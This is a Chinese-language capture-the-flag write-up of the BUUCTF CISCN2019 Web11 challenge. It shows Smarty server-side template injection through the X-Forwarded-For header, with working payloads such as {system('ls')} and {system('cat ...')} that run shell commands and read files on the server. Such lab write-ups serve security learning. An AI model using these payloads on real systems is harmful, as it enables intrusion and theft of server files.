BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入

BUUCTF之[CISCN2019 华东南赛区]Web11

知识点

  • SSTI
  • smarty
  • X-Forwarded-For

题目
BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入_第1张图片
于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1
BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入_第2张图片
emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTIsmarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到!
所以开始尝试一下:X-Forwarded-For:{7*8}
BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入_第3张图片
获取当前目录有那些文件:X-Forwarded-For:{system('ls')}
BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入_第4张图片
读取某个文件比如:X-Forwarded-For:{system('cat /api')}。但是我试了以下的所有文件都没找到flag

  • X-Forwarded-For:{system(‘cat /api’)}
  • X-Forwarded-For:{system(‘cat /css’)}
  • X-Forwarded-For:{system(‘cat /index.php’)}
  • X-Forwarded-For:{system(‘cat /smarty’)}
  • X-Forwarded-For:{system(‘cat /templates_c’)}
  • X-Forwarded-For:{system(‘cat /xff’)}
  • X-Forwarded-For:{system(‘cat /flag’)}
  • X-Forwarded-For:{system(‘cat /flag.php’)}

所以猜测flag可能是在根目录下,所以X-Forwarded-For:{system('cat ../../../../../../../../flag')}
BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入_第5张图片
这样就可以获取到flag啦!!!

你可能感兴趣的:(CTF-WEB,注入,web,php,安全)